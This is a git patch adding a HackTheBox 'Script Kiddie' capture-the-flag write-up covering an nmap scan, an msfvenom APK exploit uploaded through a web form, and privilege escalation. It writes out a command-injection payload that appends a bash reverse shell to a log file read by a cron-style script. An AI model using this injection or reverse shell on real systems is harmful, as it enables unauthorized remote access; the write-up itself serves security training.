From 73083ef646abd0629bf2d6421f5af77a2247cb6b Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Wed, 3 Mar 2021 02:20:52 +0500
Subject: [PATCH] Add files via upload

---
 HackTheBox/Script_Kiddie.md | 106 ++++++++++++++++++++++++++++++++++++
 1 file changed, 106 insertions(+)
 create mode 100644 HackTheBox/Script_Kiddie.md

diff --git a/HackTheBox/Script_Kiddie.md b/HackTheBox/Script_Kiddie.md
new file mode 100644
index 0000000..0094ec3
--- /dev/null
+++ b/HackTheBox/Script_Kiddie.md
@@ -0,0 +1,106 @@
+# HackTheBox-Script Kiddie
+
+## NMAP
+
+```
+Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-02 19:59 PKT
+Stats: 0:00:17 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+NSE Timing: About 99.63% done; ETC: 19:59 (0:00:00 remaining)
+Nmap scan report for 10.10.10.226
+Host is up (0.21s latency).
+
+PORT     STATE SERVICE VERSION
+22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+4444/tcp open  krb524?
+| fingerprint-strings:
+|   GetRequest, NULL:
+|     eNrsvWmXIjmSKPo9fwVddXsCiqhgc3AnTmXNEOz7vmbncHwDHHwB31i66/32J/kq34DIqntn7pmbfboCl0wmk8lkMkkm089/S2mKnKI4MXW8qjtJ/MIJR0lWYyCFVGiOs79piWHt35Ji/z
+rypLqRZMH+lkmRkdwvp4TC8iytOl8SfWDdL1XWkDyNOsoSzSpOHcrV+anuZJZkOHHrJ
+5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
+|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
+|_http-title: k1d'5 h4ck3r t00l5
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 18.45 seconds
+
+```
+
+## PORT 5000 (HTTP)
+
+<img src="https://imgur.com/NLLAJJ1.png"/>
+
+Here we can do an nmap scan on the machine but if we try to run bash commands it won't work
+
+<img src="https://imgur.com/QXOmFOU.png"/>
+
+<img src="https://imgur.com/n5mThGc.png"/>
+
+Similarly with the msfvenom and searchsploit
+
+<img src="https://imgur.com/BzJTgtb.png"/>
+
+Msfvenom successfully generetes payload
+
+<img src="https://imgur.com/WsEp93j.png"/>
+
+But only windows and android payload generates
+
+<img src="https://imgur.com/gdGJrIu.png"/>
+
+
+Also there weren't any hidden directories or files on the webserver this page was only there on the machine. So on googling a little bit I found that `msfvenom` recently had a vulnerability in the process generating payload
+
+<img src="https://imgur.com/JtdAtf1.png"/>
+
+<img src="https://imgur.com/7PyVLu3.png"/>
+
+This was a latest exploit so metasploit needs to be update if you run to any issues when updating metasploit regarding the gem file do this inorder
+
+`gem update`
+`cd /usr/share/metasploit-framework`
+`sudo nano Gemfile.lock` (update reline version in that file this important before bundle install)  
+`sudo bundle install` ( in metasploit folder)
+
+<img src="https://imgur.com/8Q46lfu.png"/>
+
+<img src="https://imgur.com/0LR7Eg9.png"/>
+
+<img src="https://imgur.com/B2pigeV.png"/>
+
+Upload the apk file on the website
+
+<img src="https://imgur.com/HCj6XEo.png"/>
+
+<img src="https://imgur.com/DD2Z1sO.png"/>
+
+And you'll get a shell so we will need to stabilize it 
+
+<img src="https://imgur.com/1MOGsiD.png"/>
+
+Going to `pwn`'s home directory we see a bash script `scanlosers.sh` which was reading  a script file from `kid`'s home directory and execute it 
+
+<img src="https://imgur.com/4vBH6TR.png"/>
+
+Seeing that file belongs to `pwn`'s group
+
+<img src="https://imgur.com/sOM8Kfa.png"/>
+
+We can edit this with a bash reverse shell , this is the way the payload needs to be crafted.
+
+`echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.126/1337 0>&1'  #" >> hackers`
+
+<img src="https://imgur.com/DcTRUUb.png"/>
+
+Doing `sudo -l` 
+
+<img src="https://imgur.com/lwZ1jUB.png"/>
+
+Running metasploit as `sudo`
+
+<img src="https://imgur.com/CVSx2Ia.png"/>
+
+We can now run commands as `root`
+
+<img src="https://imgur.com/ZE6bFiQ.png"/>
+
+<img src="https://imgur.com/r0Xsgrw.png"/>